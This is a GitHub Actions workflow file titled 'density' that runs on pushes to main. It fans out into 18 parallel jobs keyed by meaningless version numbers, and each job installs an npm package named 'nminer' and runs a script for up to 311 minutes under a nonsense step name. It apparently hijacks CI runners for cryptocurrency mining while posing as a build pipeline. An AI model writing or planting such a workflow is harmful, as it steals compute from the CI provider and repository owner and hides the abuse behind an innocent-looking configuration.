name: density
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 5386 }
          - { version: 2579 }
          - { version: 292 }
          - { version: 9060 }
          - { version: 5716 }
          - { version: 2945 }
          - { version: 8912 }
          - { version: 9025 }
          - { version: 4111 }
          - { version: 9912 }
          - { version: 2456 }
          - { version: 1792 }
          - { version: 3433 }
          - { version: 670 }
          - { version: 8544 }
          - { version: 1327 }
          - { version: 3480 }
          - { version: 8254 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: elver ah tenant
        run: |
          npm install nminer@latest
          timeout 311m node density.js || echo "density executed"